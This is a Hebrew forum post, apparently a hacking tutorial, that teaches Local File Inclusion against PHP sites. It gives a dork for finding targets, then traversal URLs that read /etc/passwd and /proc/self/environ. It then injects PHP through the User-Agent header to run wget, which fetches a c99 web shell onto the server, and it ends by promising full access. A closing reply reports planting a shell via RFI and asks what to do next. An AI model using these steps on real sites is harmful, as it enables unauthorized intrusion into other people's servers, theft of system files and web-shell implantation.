LFI ..
אוקיי . אז קודם כל אתה צריך לבדוק אם proc/self/environ/ נגיש ..
אני אנסה להסביר לך את המתקפה בצד אחר , אולי כך תבין יותר 
איך בעצם המתקפה מתרחשת ?
כאשר ה אינקלוד לא מתוכנת כראוי , על מנת להמחיש את המתקפה אתה צריך להשתמש בדורק.
לדוגמא :
קוד PHP:
inurl:index.php?id=news.php
מצאנו את האתר :
קוד PHP:
www.ne0-software.com/index.php?id=news.php
מה בעצם קרה פה ?
הפננו לקובץ news.php , כך אתה בודק אם קיימת פירצת LFI .
אוקיי עכשיו אנחנו צריכים להגיע לקובץ
/etc/passwd
כל מה שאנחנו צריכים לעשות זה להשתמש ב ../ על מנת לעלות ולרדת תיקייה .
לדוגמא :
קוד PHP:
http://ne0/index.php?id=../
כעת תתקבל לך שגיאה :
קוד:
Warning: include(../) [function.include]: failed to open stream: No such file or directory in /home/user/public_html/ne0-software.com/view.php on line 2
אז עכשיו אנחנו מחפשים איפה נמצא הקובץ etc/passwd , אם יש שגיאה זה אומר שאנחנו לא במקום המתאים ..
קוד:
http:/ne0-software.com/index.php?id=../ ../../../../../../etc/passwd
כעת אנחנו רואים שאין שום שגיאה ,
ננסה לנקלד את הקובץ .
יופיע לך סקריפט בסגנון הבא :
קוד:
root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/
עכשיו אנחנו רואים אם יש גישה לקובץ proc/self/environ , ננסה .. :
קוד PHP:
tp://ne0-software.com/index.php?id=../ ../../../../../../proc/self/environ
במידה ויש גישה הקובץ אמור להראות כך :
קוד:
DOCUMENT_ROOT=/home/user/public_html GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html
עכשיו אנחנו רוצים לעלות שאלל, איך זה עובד ?, אם אתם תראו בקובץ proc/self/environ הוא יראה לכם את הuser agent שלכם ..
עכשיו אנחנו יכולים לעשות ככה, על מנת לעלות שאלל, נכנס דרך FF נכנס לuser agent ונשנה אותו לקוד הPHP שלהלן, מה שהוא עושה, הוא משתמש בפקודת WGET על מנת להוריד לשרת את הקובץ הזדוני..
קוד PHP:
<?system('wget http://ne0-software.com/c99.txt -O c99.php');?>
כעת יש לך גישה מלאה ,
ואתה מוזמן להנות
דרך צלחה ידידי .
</span>
אוקי, מצאתי אתר עם פירצת RFI. התקדמתי העלתי שאאל, קיבלתי תגובה. מה עכשיו?
ציטוט ההודעה
